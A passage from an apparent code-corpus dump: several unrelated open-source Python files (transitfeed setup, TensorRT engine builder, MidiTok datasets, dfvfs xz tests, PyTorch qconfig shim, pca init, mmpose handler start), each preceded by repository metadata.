import py2exe
has_py2exe = True
except ImportError as e:
# Won't be able to generate win32 exe
has_py2exe = False
# py2exe doesn't automatically include pytz dependency because it is optional
options = {'py2exe': {'packages': ['pytz', 'pybcp47']}}
scripts_for_py2exe = ['feedvalidator.py', 'schedule_viewer.py', 'kmlparser.py',
'kmlwriter.py', 'merge.py', 'unusual_trip_filter.py',
'location_editor.py', 'feedvalidator_googletransit.py',
'upgrade_translations.py', 'visualize_pathways.py']
# On Nov 23, 2009 Tom Brown said: I'm not confident that we can include a
# working copy of this script in the py2exe distribution because it depends on
# ogr. I do want it included in the source tar.gz.
scripts_for_source_only = ['shape_importer.py']
kwargs = {}
if has_py2exe:
kwargs['console'] = scripts_for_py2exe
# py2exe seems to ignore package_data and not add marey_graph. This makes it
# work.
kwargs['data_files'] = \
[('schedule_viewer_files',
glob.glob(os.path.join('gtfsscheduleviewer', 'files', '*')))]
options['py2exe'] = {'dist_dir': 'transitfeed-windows-binary-%s' % VERSION}
setup(
version=VERSION,
name='transitfeed',
url='https://github.com/google/transitfeed/',
download_url='https://github.com/google/transitfeed/archive/'
'%s.tar.gz' % VERSION,
maintainer='Multiple',
maintainer_email='transitfeed@googlegroups.com',
description='GTFS library and tools',
long_description='This module provides a library for reading, writing and '
'validating GTFS files. It includes some scripts that validate a feed, '
'display it using the Google Maps API and the start of a KML importer '
'and exporter.',
platforms='OS Independent',
license='Apache License, Version 2.0',
packages=['gtfsscheduleviewer', 'transitfeed'],
# Also need to list package_data contents in MANIFEST.in for it to be
# included in sdist. See "[Distutils] package_data not used by sdist
# command" Feb 2, 2007
package_data={'gtfsscheduleviewer': ['files/*']},
scripts=scripts_for_py2exe + scripts_for_source_only,
zip_safe=False,
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Information Technology',
'Intended Audience :: Other Audience',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: GIS',
'Topic :: Software Development :: Libraries :: Python Modules'
],
options=options,
**kwargs
)
if has_py2exe:
# Some data files are not copied automatically by py2exe into the
# library.zip file. This concerns mainly files which are loaded by modules
# using pkg_resources.
import zipfile
# Open the library.zip file for appending additional files.
zipfile_path = os.path.join(options['py2exe']['dist_dir'], 'library.zip')
z = zipfile.ZipFile(zipfile_path, 'a')
# Sometime between pytz-2008a and pytz-2008i common_timezones started to
# include only names of zones with a corresponding data file in zoneinfo.
# pytz installs the zoneinfo directory tree in the same directory
# as the pytz/__init__.py file. These data files are loaded using
# pkg_resources.resource_stream. py2exe does not copy this to library.zip so
# resource_stream can't find the files and common_timezones is empty when
# read in the py2exe executable.
# This manually copies zoneinfo into the zip. See also
# https://github.com/google/transitfeed/issues/121
import pytz
# Make sure the layout of pytz hasn't changed
assert (pytz.__file__.endswith('__init__.pyc') or
pytz.__file__.endswith('__init__.py')), pytz.__file__
zoneinfo_dir = os.path.join(os.path.dirname(pytz.__file__), 'zoneinfo')
# '..\\Lib\\pytz\\__init__.py' -> '..\\Lib'
disk_basedir = os.path.dirname(os.path.dirname(pytz.__file__))
for absdir, directories, filenames in os.walk(zoneinfo_dir):
assert absdir.startswith(disk_basedir), (absdir, disk_basedir)
zip_dir = absdir[len(disk_basedir):]
for f in filenames:
z.write(os.path.join(absdir, f), os.path.join(zip_dir, f))
  # The custom pybcp47 module included in the googletransit extension reads
# from a registry file in the resource path. This manually copies the file
# language-subtag-registry.txt to the library.zip file.
import extensions.googletransit.pybcp47 as pybcp47_module
pybcp47_dir = os.path.join(os.path.dirname(pybcp47_module.__file__))
disk_basedir = os.path.dirname(os.path.dirname(os.path.dirname(pybcp47_dir)))
zip_dir = pybcp47_dir[len(disk_basedir):]
z.write(os.path.join(pybcp47_dir, 'language-subtag-registry.txt'),
os.path.join(zip_dir, 'language-subtag-registry.txt'))
# Finally close the library.zip file.
z.close()
|
d9dac97d9ade3a89fc18d2b23124ebc8ecadf62f
|
68384147be31aadd870c0153ac75466b1f5de122
|
/keras_cv_attention_models/imagenet/tensorrt_engine.py
|
88a570cc7d5d09ed5cc031f1cc0b7805f1864629
|
[
"CC-BY-NC-4.0",
"CC-BY-4.0",
"MIT",
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] |
permissive
|
leondgarse/keras_cv_attention_models
|
cbee0b641e4ed727d9646669cf1614ddf3435a8a
|
ac1d1146ef10823ce83bffdc527f227e9732ab55
|
refs/heads/main
| 2023-08-31T07:09:57.302178
| 2023-08-25T12:51:31
| 2023-08-25T12:51:31
| 391,777,965
| 460
| 69
|
MIT
| 2022-10-13T14:31:01
| 2021-08-02T00:59:55
|
Python
|
UTF-8
|
Python
| false
| false
| 11,367
|
py
|
tensorrt_engine.py
|
import os
import numpy as np
import tensorrt as trt
import pycuda.driver as cuda
try:
# Use autoprimaryctx if available (pycuda >= 2021.1) to prevent issues with other modules that rely on the primary device context.
import pycuda.autoprimaryctx
except ModuleNotFoundError:
import pycuda.autoinit
TRT_LOGGER = trt.Logger(trt.Logger.INFO)
def init_mean_std_by_rescale_mode(rescale_mode):
if isinstance(rescale_mode, (list, tuple)): # Specific mean and std
mean, std = rescale_mode
elif rescale_mode == "torch":
mean = np.array([0.485, 0.456, 0.406]).astype("float32") * 255.0
std = np.array([0.229, 0.224, 0.225]).astype("float32") * 255.0
elif rescale_mode == "tf": # [0, 255] -> [-1, 1]
mean, std = 127.5, 127.5
# mean, std = 127.5, 128.0
elif rescale_mode == "tf128": # [0, 255] -> [-1, 1]
mean, std = 128.0, 128.0
elif rescale_mode == "raw01":
mean, std = 0, 255.0 # [0, 255] -> [0, 1]
else:
mean, std = 0, 1 # raw inputs [0, 255]
return mean, std
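# Illustrative values: init_mean_std_by_rescale_mode("torch") returns the usual
# ImageNet statistics scaled to the [0, 255] range, i.e. mean ~ [123.675,
# 116.28, 103.53] and std ~ [58.395, 57.12, 57.375].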
class ImageCalibrator(trt.IInt8EntropyCalibrator2):
def __init__(self, data, cache_file, rescale_mode="torch"):
super().__init__()
self.data, self.cache_file, self.rescale_mode = data, cache_file, rescale_mode
self.built = False
def build(self, target_shape, batch_size, data_format="channels_last"):
# Every time get_batch is called, the next batch of size batch_size will be copied to the device and returned.
mean, std = init_mean_std_by_rescale_mode(self.rescale_mode)
target_shape = target_shape if isinstance(target_shape, (list, tuple)) else [target_shape, target_shape]
        data = self.data
        from PIL import Image  # used by both branches below (Image.open / Image.fromarray)
        if isinstance(data, str):
print(">>>> Read input data from path:", data)
target_shape = list(target_shape)[::-1] # [width, height] for Image.resize
data = [np.array(Image.open(os.path.join(data, ii)).resize(target_shape)) for ii in os.listdir(data)]
else:
resize_shape = list(target_shape)[::-1] # [width, height] for Image.resize
target_shape = tuple(target_shape)
data = [ii if tuple(ii.shape[:2]) == target_shape else np.array(Image.fromarray(ii).resize(resize_shape)) for ii in data]
data = (np.array(data) - mean) / std
if data_format != "channels_last":
data = data.transpose([0, 3, 1, 2])
self.built_data, self.data_format = data, data_format
self.batch_size, self.target_shape = batch_size, target_shape
self.current_index = 0
self.device_input = cuda.mem_alloc(data[0].nbytes * self.batch_size) # Allocate enough memory for a whole batch.
self.built = True
print(">>>> Built data info: data.shape={}, data.min={:.4f}, data.max={:.4f}".format(data.shape, data.min(), data.max()))
def get_batch_size(self):
return self.batch_size
# TensorRT passes along the names of the engine bindings to the get_batch function.
# You don't necessarily have to use them, but they can be useful to understand the order of
# the inputs. The bindings list is expected to have the same ordering as 'names'.
def get_batch(self, names):
if self.current_index + self.batch_size > self.built_data.shape[0]:
return None
current_batch = int(self.current_index / self.batch_size)
if current_batch % 10 == 0:
print(">>>> Calibrating batch {:}, containing {:} images".format(current_batch, self.batch_size))
batch = self.built_data[self.current_index : self.current_index + self.batch_size].ravel()
cuda.memcpy_htod(self.device_input, batch)
self.current_index += self.batch_size
return [self.device_input]
def read_calibration_cache(self):
# If there is a cache, use it instead of calibrating again. Otherwise, implicitly return None.
if os.path.exists(self.cache_file):
with open(self.cache_file, "rb") as f:
return f.read()
def write_calibration_cache(self, cache):
with open(self.cache_file, "wb") as f:
f.write(cache)
def build_onnx_engine_one_input(model_file, engine_path=None, int8_calibrator=None, batch_size=-1, data_format="auto", max_workspace_size=-1):
# model_file, engine_path, int8_calibrator, batch_size, data_format, max_workspace_size = "aaa.onnx", None, None, -1, "auto", -1
    EXPLICIT_BATCH = 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
trt.init_libnvinfer_plugins(TRT_LOGGER, namespace="")
builder = trt.Builder(TRT_LOGGER)
config = builder.create_builder_config()
max_workspace_size = max_workspace_size if max_workspace_size > 0 else 8
# config.max_workspace_size = max_workspace_size * (2 ** 30) # 8 GB
config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, pool_size=max_workspace_size * (2**30))
network = builder.create_network(EXPLICIT_BATCH)
parser = trt.OnnxParser(network, TRT_LOGGER)
with open(model_file, "rb") as model:
parser.parse(model.read())
assert parser.num_errors == 0
inputs = network.get_input(0)
input_shape = inputs.shape
if batch_size > 0:
input_shape = [batch_size] + list(input_shape[1:])
network.get_input(0).shape = input_shape
else:
batch_size = inputs.shape[0]
# builder.max_batch_size = batch_size
print(">>>> Input name: {}, shape: {}, dtype: {}".format(inputs.name, input_shape, inputs.dtype))
outputs = [network.get_output(ii) for ii in range(network.num_outputs)]
for output in outputs:
print(">>>> Output name: {}, shape: {}, dtype: {}".format(output.name, output.shape, output.dtype))
if int8_calibrator is None:
config.set_flag(trt.BuilderFlag.FP16)
else:
config.set_flag(trt.BuilderFlag.INT8)
if data_format == "auto":
data_format = "channels_last" if input_shape[-1] < input_shape[1] else "channels_first"
data_input_shape = input_shape[1:-1] if data_format == "channels_last" else input_shape[2:]
print("data_format = {}, data_input_shape = {}".format(data_format, data_input_shape))
int8_calibrator.build(data_input_shape, batch_size, data_format=data_format)
config.int8_calibrator = int8_calibrator
# Dynamic batch_size
# profile = builder.create_optimization_profile()
# input_shape = network.get_input(0).shape[1:]
# profile.set_shape(network.get_input(0).name, (1, *input_shape), (1, *input_shape), (builder.max_batch_size, *input_shape))
# config.add_optimization_profile(profile)
# engine = builder.build_engine(network, config)
engine = builder.build_serialized_network(network, config)
if engine_path is None:
engine_path = "{}_{}.trt".format(os.path.splitext(model_file)[0], "float16" if int8_calibrator is None else "int8")
with open(engine_path, "wb") as ff:
print(">>>> Serializing engine to file: {:}".format(engine_path))
ff.write(engine)
return engine
class EngineInferenceOneInOneOut:
"""
>>> !pip install tensorrt pycuda
>>> import torch
>>> from keras_cv_attention_models.imagenet import tensorrt_engine
>>> aa = tensorrt_engine.ImageCalibrator('calibration_imagenet/', 'foo.cache')
>>> ee = tensorrt_engine.build_onnx_engine_one_input('aaa.onnx', int8_calibrator=aa)
>>> cc = tensorrt_engine.EngineInferenceOneInOneOut(ee, max_batch_size=4)
>>> print(cc(np.ones([1, 3, 224, 224])).shape)
>>> # (1, 1000)
>>> print(cc(np.ones([4, 3, 224, 224])).shape)
>>> # (4, 1000)
"""
def __init__(self, engine, max_batch_size=1):
if isinstance(engine, str):
            with open(engine, "rb") as ff:  # "engine" is a file path here
engine = ff.read()
with trt.Runtime(TRT_LOGGER) as runtime:
engine = runtime.deserialize_cuda_engine(engine)
assert runtime
input_binding, output_binding = None, None
for binding in engine:
if engine.get_tensor_mode(binding) == trt.TensorIOMode.INPUT:
input_binding = binding
else:
output_binding = binding
assert input_binding
assert output_binding
self.input_shape = [max_batch_size, *engine.get_tensor_shape(input_binding)[1:]]
self.input_dtype = trt.nptype(engine.get_tensor_dtype(input_binding))
size = trt.volume(engine.get_tensor_shape(input_binding)) * max_batch_size
self.host_input = cuda.pagelocked_empty(shape=[size], dtype=self.input_dtype)
self.cuda_input = cuda.mem_alloc(self.host_input.nbytes)
self.input_binding, self.output_binding = input_binding, output_binding
self.output_shape = [max_batch_size, *engine.get_tensor_shape(output_binding)[1:]]
self.output_dtype = trt.nptype(engine.get_tensor_dtype(output_binding))
size = trt.volume(engine.get_tensor_shape(output_binding)) * max_batch_size
self.host_output = cuda.pagelocked_empty(shape=[size], dtype=self.output_dtype)
self.cuda_output = cuda.mem_alloc(self.host_output.nbytes)
self.output_dim = self.output_shape[1:]
self.output_ravel_dim = self.host_output.shape[0] // max_batch_size
self.allocations = [int(self.cuda_input), int(self.cuda_output)]
self.max_batch_size = max_batch_size
self.engine = engine
self.stream = cuda.Stream()
self.context = engine.create_execution_context()
def __call__(self, imgs):
batch_size = imgs.shape[0]
if batch_size > self.max_batch_size:
print(f"Warning: provided input with batch_size={batch_size} exceeds max_batch_size={self.max_batch_size}")
batch_size = self.max_batch_size
imgs = imgs[: self.max_batch_size]
inputs = imgs.ravel()
# self.context.set_binding_shape(0, imgs.shape)
np.copyto(self.host_input[: inputs.shape[0]], inputs)
cuda.memcpy_htod_async(self.cuda_input, self.host_input[: inputs.shape[0]], self.stream)
# Run inference asynchronously, same function in cpp is `IExecutionContext::enqueueV2`
self.context.execute_async_v2(bindings=self.allocations, stream_handle=self.stream.handle)
# Transfer predictions back from the GPU.
cuda.memcpy_dtoh_async(self.host_output[: batch_size * self.output_ravel_dim], self.cuda_output, self.stream)
# Synchronize the stream
self.stream.synchronize()
return self.host_output[: batch_size * self.output_ravel_dim].reshape([batch_size, *self.output_dim]).copy()
if __name__ == "__main__":
# !pip install kecam torch torchvision onnx pycuda tensorrt
# !git clone https://github.com/NVIDIA/TensorRT.git
# cd TensorRT/samples/trtexec
import torch
import torchvision
from kecam.imagenet.tensorrt_engine import ImageCalibrator, build_onnx_engine_one_input, EngineInferenceOneInOneOut
mm = torchvision.models.resnet50(pretrained=True)
torch.onnx.export(mm, torch.ones([1, 3, 224, 224]), "aaa.onnx")
aa = ImageCalibrator("calibration_imagenet/", "foo.cache")
ee = build_onnx_engine_one_input("aaa.onnx", int8_calibrator=aa)
cc = EngineInferenceOneInOneOut(ee)
print(cc(np.ones([1, 3, 224, 224])).shape)
|
ed6f6ee9a03080ce61e797008032803656293972
|
269ffc022565c7982017a866ec0e515c90b48940
|
/miditok/pytorch_data/datasets.py
|
08a4131c5a2a39aede10c11c66bf67ddafea4e88
|
[
"MIT"
] |
permissive
|
Natooz/MidiTok
|
36efda7fef567f4f2fc81053609568e0c6cbc678
|
a1543cd0e0a9a3ee1de6fb77abcdfcffc274b9f1
|
refs/heads/main
| 2023-09-01T14:11:00.854742
| 2023-08-31T13:44:40
| 2023-08-31T13:44:40
| 394,933,651
| 410
| 54
|
MIT
| 2023-09-07T08:18:00
| 2021-08-11T09:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 9,926
|
py
|
datasets.py
|
"""
PyTorch `Dataset` objects, to be used with PyTorch `DataLoaders` to load and send data during training.
"""
from pathlib import Path
from typing import List, Union, Sequence, Any, Mapping
from abc import ABC
from copy import deepcopy
import json
from torch import LongTensor, randint
from torch.utils.data import Dataset
from miditok import MIDITokenizer
from miditoolkit import MidiFile
from tqdm import tqdm
from ..constants import MIDI_FILES_EXTENSIONS
def split_seq_in_subsequences(
    seq: Sequence[Any], min_seq_len: int, max_seq_len: int
) -> List[Sequence[Any]]:
r"""Split a sequence of tokens into subsequences for which `min_seq_len <= len(sub_seq) <= max_seq_len`.
:param seq: sequence to split.
:param min_seq_len: minimum sequence length.
:param max_seq_len: maximum sequence length.
:return: list of subsequences.
"""
sub_seq = []
i = 0
while i < len(seq):
        if i > len(seq) - min_seq_len:
            break  # remaining tokens are fewer than min_seq_len, discard them
sub_seq.append(LongTensor(seq[i : i + max_seq_len]))
i += len(sub_seq[-1]) # could be replaced with max_seq_len
return sub_seq
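# Worked example, consistent with the break condition above: with
# min_seq_len=50 and max_seq_len=100, a 650-token sequence yields six 100-token
# subsequences plus one of 50 tokens, while a 620-token sequence yields six
# 100-token subsequences and drops the trailing 20 tokens (< min_seq_len).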
def split_dataset_to_subsequences(
files_paths: Sequence[Union[Path, str]],
out_dir: Union[Path, str],
min_seq_len: int,
max_seq_len: int,
one_token_stream: bool = True,
):
"""
:param files_paths: list of files of tokens to split.
:param out_dir: output directory to save the subsequences.
:param min_seq_len: minimum sequence length.
:param max_seq_len: maximum sequence length.
    :param one_token_stream: give False if the token files contain multiple tracks, i.e. the first dimension of
        the value of the "ids" entry corresponds to several tracks. Otherwise, leave True. (default: True)
"""
out_dir = Path(out_dir)
out_dir.mkdir(parents=True, exist_ok=True)
for file_path in files_paths:
with open(file_path) as json_file:
tokens = json.load(json_file)
# Split sequence(s)
if one_token_stream:
subseqs = split_seq_in_subsequences(tokens["ids"], min_seq_len, max_seq_len)
else:
subseqs = []
for track_seq in tokens["ids"]:
subseqs += split_seq_in_subsequences(
track_seq, min_seq_len, max_seq_len
)
# Save subsequences
for i, subseq in enumerate(subseqs):
path = out_dir / f"{file_path.name}_{i}.json"
with open(path, "w") as outfile:
new_tok = deepcopy(tokens)
new_tok["ids"] = subseq
json.dump(tokens, outfile)
class _DatasetABC(Dataset, ABC):
r"""Abstract Dataset class, holding samples (and optionally labels) and implementing the basic magic methods.
:param samples: sequence of input samples. It can directly be data, or a paths to files to be loaded.
:param labels: sequence of labels associated with the samples. (default: None)
:param sample_key_name: name of the dictionary key containing the sample data when iterating the dataset.
(default: "input_ids")
:param labels_key_name: name of the dictionary key containing the labels data when iterating the dataset.
(default: "labels")
"""
def __init__(
self,
samples: Sequence[Any] = None,
labels: Sequence[Any] = None,
sample_key_name: str = "input_ids",
labels_key_name: str = "labels",
):
if samples is not None and labels is not None:
assert len(samples) == len(
labels
), "The number of samples must be the same as the number of labels"
self.samples = samples if samples is not None else []
self.labels = labels
self.sample_key_name = sample_key_name
self.labels_key_name = labels_key_name
def reduce_nb_samples(self, nb_samples: int):
r"""Reduce the size of the dataset, by keeping `nb_samples` samples.
:param nb_samples: number of samples to keep. They will be randomly picked.
"""
idx = randint(0, len(self), (nb_samples,))
self.samples = [self.samples[id_] for id_ in idx.tolist()]
if self.labels is not None:
self.labels = [self.labels[id_] for id_ in idx.tolist()]
def __len__(self) -> int:
return len(self.samples)
def __getitem__(self, idx) -> Mapping[str, Any]:
item = {self.sample_key_name: self.samples[idx]}
if self.labels is not None:
item[self.labels_key_name] = self.labels[idx]
return item
def __repr__(self):
return self.__str__()
def __str__(self) -> str:
return "No data loaded" if len(self) == 0 else f"{len(self.samples)} samples"
class DatasetTok(_DatasetABC):
r"""Basic `Dataset` loading Json files of tokenized MIDIs, or MIDI files to tokenize, and
store the token ids in RAM. It outputs token sequences that can be used to train generative models.
    The token sequences being loaded will then be split into subsequences, of length
    comprised between `min_seq_len` and `max_seq_len`.
    For example, with `min_seq_len = 50` and `max_seq_len = 100`:
    * a sequence of 650 tokens will be split into 6 subsequences of 100 tokens plus one subsequence of 50 tokens;
    * a sequence of 620 tokens will be split into 6 subsequences of 100 tokens, the trailing 20 tokens being
    discarded as they are fewer than `min_seq_len`;
    * a sequence of 670 tokens will be split into 6 subsequences of 100 tokens plus one subsequence of 70 tokens.
    This `Dataset` class is well suited if you have enough RAM to store all the data, as it does not require you to
    split the dataset into subsequences of the desired length beforehand.
Note that if you directly load MIDI files, the loading can take some time as they will need to be tokenized.
You might want to tokenize them before once with the `tokenizer.tokenize_midi_dataset()` method.
:param files_paths: list of paths to files to load.
:param min_seq_len: minimum sequence length (in nb of tokens)
:param max_seq_len: maximum sequence length (in nb of tokens)
:param tokenizer: tokenizer object, to use to load MIDIs instead of tokens. (default: None)
    :param one_token_stream: give False if the token files contain multiple tracks, i.e. the first dimension of
        the value of the "ids" entry corresponds to several tracks. Otherwise, leave True. (default: True)
:param sample_key_name: name of the dictionary key containing the sample data when iterating the dataset.
(default: "input_ids")
"""
def __init__(
self,
files_paths: Sequence[Path],
min_seq_len: int,
max_seq_len: int,
tokenizer: MIDITokenizer = None,
one_token_stream: bool = True,
sample_key_name: str = "input_ids",
):
samples = []
if tokenizer is not None:
one_token_stream = tokenizer.one_token_stream
for file_path in tqdm(
files_paths,
desc=f"Loading data: {files_paths[0].parent}",
miniters=int(len(files_paths) / 20),
maxinterval=480,
):
if file_path.suffix in MIDI_FILES_EXTENSIONS:
midi = MidiFile(file_path)
for _ in range(len(midi.instruments) - 1):
del midi.instruments[1] # removes all tracks except first one
tokens = tokenizer.midi_to_tokens(midi)
if one_token_stream:
tokens = tokens.ids
else:
tokens = [seq.ids for seq in tokens]
else:
with open(file_path) as json_file:
tokens = json.load(json_file)["ids"]
if one_token_stream:
tokens = [tokens]
# Cut tokens in samples of appropriate length
for seq in tokens:
subseqs = split_seq_in_subsequences(seq, min_seq_len, max_seq_len)
samples += subseqs
super().__init__(samples, sample_key_name=sample_key_name)
class DatasetJsonIO(_DatasetABC):
r"""Basic `Dataset` loading Json files of tokenized MIDIs on the fly.
When executing `dataset[idx]`, this class will load the `files_paths[idx]` json file and return the token ids,
that can be used to train generative models.
**This class is only compatible with tokens saved as a single stream of tokens
(** `tokenizer.one_token_stream` **).** If you plan to use it with token files containing multiple token streams,
    you should first split it with `miditok.pytorch_data.split_dataset_to_subsequences()`.
    It allows truncating the sequence length to a `max_seq_len` limit, but will not split the sequences into
    subsequences. If your dataset contains sequences with widely varying lengths, you might want to first split it
into subsequences with the `miditok.pytorch_data.split_dataset_to_subsequences()` method before loading it to avoid
losing data.
This `Dataset` class is well suited if you are using a large dataset, or have access to limited RAM resources.
:param files_paths: list of paths to files to load.
:param max_seq_len: maximum sequence length (in nb of tokens). (default: None)
"""
def __init__(
self,
files_paths: Sequence[Path],
max_seq_len: int = None,
):
self.max_seq_len = max_seq_len
super().__init__(files_paths)
def __getitem__(self, idx) -> Mapping[str, LongTensor]:
with open(self.samples[idx]) as json_file:
token_ids = json.load(json_file)["ids"]
if self.max_seq_len is not None and len(token_ids) > self.max_seq_len:
token_ids = token_ids[: self.max_seq_len]
item = {"input_ids": LongTensor(token_ids)}
return item
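# A hedged DataLoader sketch (the "tokens" directory is an assumption):
#
#     from pathlib import Path
#     from torch.utils.data import DataLoader
#
#     dataset = DatasetJsonIO(sorted(Path("tokens").glob("*.json")), max_seq_len=512)
#     loader = DataLoader(dataset, batch_size=1)  # sequences vary in length:
#     # either pad them in a custom collate_fn or keep batch_size=1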
|
4100d5c2ad0f2307a58faa7d5fdf368d47595078
|
29dfa1deefc72493d1b1eecf1a8df62e24599a77
|
/tests/compression/xz_decompressor.py
|
92a0b901597c4e3ccb07773a4da2cbd45d093740
|
[
"Apache-2.0"
] |
permissive
|
log2timeline/dfvfs
|
fd301eaf721a9945641a44ff722aec963158a6b3
|
28756d910e951a22c5f0b2bcf5184f055a19d544
|
refs/heads/main
| 2023-08-07T22:45:45.432668
| 2023-07-30T12:17:56
| 2023-07-30T12:17:56
| 23,820,144
| 197
| 65
|
Apache-2.0
| 2023-07-30T12:17:58
| 2014-09-09T05:06:44
|
Python
|
UTF-8
|
Python
| false
| false
| 2,425
|
py
|
xz_decompressor.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for the xz decompressor object."""
import unittest
try:
from dfvfs.compression import xz_decompressor
except ImportError:
xz_decompressor = None
from dfvfs.lib import errors
from tests.compression import test_lib
@unittest.skipIf(xz_decompressor is None, 'requires LZMA compression support')
class LZMADecompressorTestCase(test_lib.DecompressorTestCase):
"""Tests for the lzma decompressor object."""
def testDecompress(self):
"""Tests the Decompress method."""
decompressor = xz_decompressor.LZMADecompressor()
compressed_data = (
b']\x00\x00\x80\x00\xff\xff\xff\xff\xff\xff\xff\xff\x00*\x1a\t\'d\x1c'
b'\x87\x8aO\xcaL\xf4\xf8!\xda\x88\xd8\xff\xff\xeb\xcc\x00')
uncompressed_data, _ = decompressor.Decompress(compressed_data)
expected_uncompressed_data = b'This is a test.'
self.assertEqual(uncompressed_data, expected_uncompressed_data)
# Test to trigger lzma raising EOFError.
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
# Test to trigger lzma raising IOError.
decompressor = xz_decompressor.LZMADecompressor()
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
@unittest.skipIf(xz_decompressor is None, 'requires LZMA compression support')
class XZDecompressorTestCase(test_lib.DecompressorTestCase):
"""Tests for the xz decompressor object."""
def testDecompress(self):
"""Tests the Decompress method."""
decompressor = xz_decompressor.XZDecompressor()
compressed_data = (
b'\xfd7zXZ\x00\x00\x01i"\xde6\x02\xc0\x13\x0f!\x01\x16\x00\xc0\xb7\xdc'
b'\xe9\x01\x00\x0eThis is a test.\x00\x00]\xc9\xc3\xc6\x00\x01#\x0f\xdb'
b'\xdf\x90\x0e\x90B\x99\r\x01\x00\x00\x00\x00\x01YZ')
uncompressed_data, _ = decompressor.Decompress(compressed_data)
expected_uncompressed_data = b'This is a test.'
self.assertEqual(uncompressed_data, expected_uncompressed_data)
# Test to trigger xz raising EOFError.
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
# Test to trigger xz raising IOError.
decompressor = xz_decompressor.XZDecompressor()
with self.assertRaises(errors.BackEndError):
decompressor.Decompress(b'This is a test.')
if __name__ == '__main__':
unittest.main()
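# To run this module directly from the repository root (a sketch):
#   python -m unittest tests.compression.xz_decompressor -v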
|
f5a07fe1929cd9e6e654afa908bed8537bb90699
|
afd2087e80478010d9df66e78280f75e1ff17d45
|
/torch/quantization/qconfig.py
|
6bb7e14110cb9cdc4e9c2c418c6776ea6445f0d3
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-secret-labs-2011",
"LicenseRef-scancode-generic-cla",
"BSL-1.0",
"Apache-2.0"
] |
permissive
|
pytorch/pytorch
|
7521ac50c47d18b916ae47a6592c4646c2cb69b5
|
a6f7dd4707ac116c0f5fb5f44f42429f38d23ab4
|
refs/heads/main
| 2023-08-03T05:05:02.822937
| 2023-08-03T00:40:33
| 2023-08-03T04:14:52
| 65,600,975
| 77,092
| 24,610
|
NOASSERTION
| 2023-09-14T21:58:39
| 2016-08-13T05:26:41
|
Python
|
UTF-8
|
Python
| false
| false
| 910
|
py
|
qconfig.py
|
# flake8: noqa: F401
r"""
This file is in the process of migration to `torch/ao/quantization`, and
is kept here for compatibility while the migration process is ongoing.
If you are adding a new entry/functionality, please, add it to the
`torch/ao/quantization/qconfig.py`, while adding an import statement
here.
"""
from torch.ao.quantization.qconfig import (
_add_module_to_qconfig_obs_ctr,
_assert_valid_qconfig,
default_activation_only_qconfig,
default_debug_qconfig,
default_dynamic_qconfig,
default_per_channel_qconfig,
default_qat_qconfig,
default_qat_qconfig_v2,
default_qconfig,
default_weight_only_qconfig,
float16_dynamic_qconfig,
float16_static_qconfig,
float_qparams_weight_only_qconfig,
get_default_qat_qconfig,
get_default_qconfig,
per_channel_dynamic_qconfig,
QConfig,
qconfig_equals,
QConfigAny,
QConfigDynamic,
)
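# During the migration both import paths resolve to the same objects, e.g.:
#
#     from torch.quantization.qconfig import default_qconfig     # legacy path
#     from torch.ao.quantization.qconfig import default_qconfig  # new home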
|
5d60e5123a6e23163ee49d674cf2506d5cbc0e65
|
ebb3188aa1b3846d13eafbad4714326a1f6ece64
|
/pca/__init__.py
|
7d93884c227411f751fdea58ea88b8290db1e8c4
|
[
"MIT"
] |
permissive
|
erdogant/pca
|
14793e78c02069e6983d718ecadee76eeef4253e
|
9c42b0967d81c5dc985837be2f5d1dcb729b4702
|
refs/heads/master
| 2023-08-17T18:54:40.445251
| 2023-08-05T18:43:02
| 2023-08-05T18:43:02
| 233,232,884
| 247
| 45
|
MIT
| 2022-02-22T19:33:08
| 2020-01-11T13:04:39
|
Python
|
UTF-8
|
Python
| false
| false
| 1,191
|
py
|
__init__.py
|
from pca.pca import pca
from pca.pca import (
import_example,
hotellingsT2,
spe_dmodx,
)
__author__ = 'Erdogan Tasksen'
__email__ = 'erdogant@gmail.com'
__version__ = '2.0.4'
# module level doc-string
__doc__ = """
pca
=====================================================================
pca: A Python Package for Principal Component Analysis.
Examples
--------
>>> from pca import pca
>>>
>>> # Initialize
>>> model = pca(n_components=3)
>>>
>>> # Load example data
>>> df = model.import_example(data='iris')
>>>
>>> # Fit using PCA
>>> results = model.fit_transform(df)
>>>
>>> # Scree plot together with explained variance.
>>> fig, ax = model.plot()
>>>
>>> # Plot loadings
>>> fig, ax = model.biplot()
>>> fig, ax = model.biplot(density=True, SPE=True, HT2=True)
>>> fig, ax = model.scatter()
>>>
>>> # 3D plots
>>> fig, ax = model.scatter3d()
>>> fig, ax = model.biplot3d(density=True, SPE=True, HT2=True)
>>>
>>> # Normalize out PCs
>>> X_norm = model.norm(X)
References
----------
* Blog: https://towardsdatascience.com/what-are-pca-loadings-and-biplots-9a7897f2e559
* Github: https://github.com/erdogant/pca
* Documentation: https://erdogant.github.io/pca/
"""
|
55980fa13232ffbfb616b2d647fe1a093b064862
|
0db19410e9751790af8ce4a0a9332293e379c02f
|
/tools/torchserve/mmpose_handler.py
|
d7da881cdc9dd26ab23242052668958b8172ce57
|
[
"Apache-2.0"
] |
permissive
|
open-mmlab/mmpose
|
2c9986521d35eee35d822fb255e8e68486026d94
|
537bd8e543ab463fb55120d5caaa1ae22d6aaf06
|
refs/heads/main
| 2023-08-30T19:44:21.349410
| 2023-07-04T13:18:22
| 2023-07-04T13:18:22
| 278,003,645
| 4,037
| 1,171
|
Apache-2.0
| 2023-09-14T09:44:55
| 2020-07-08T06:02:55
|
Python
|
UTF-8
|
Python
| false
| false
| 2,709
|
py
|
mmpose_handler.py
|
# Copyright (c) OpenMMLab. All rights reserved.
import base64
import os
import mmcv
import torch
from mmpose.apis import (inference_bottom_up_pose_model,
inference_top_down_pose_model, init_pose_model)
from mmpose.models.detectors import AssociativeEmbedding, TopDown
try:
from ts.torch_handler.base_handler import BaseHandler
except ImportError:
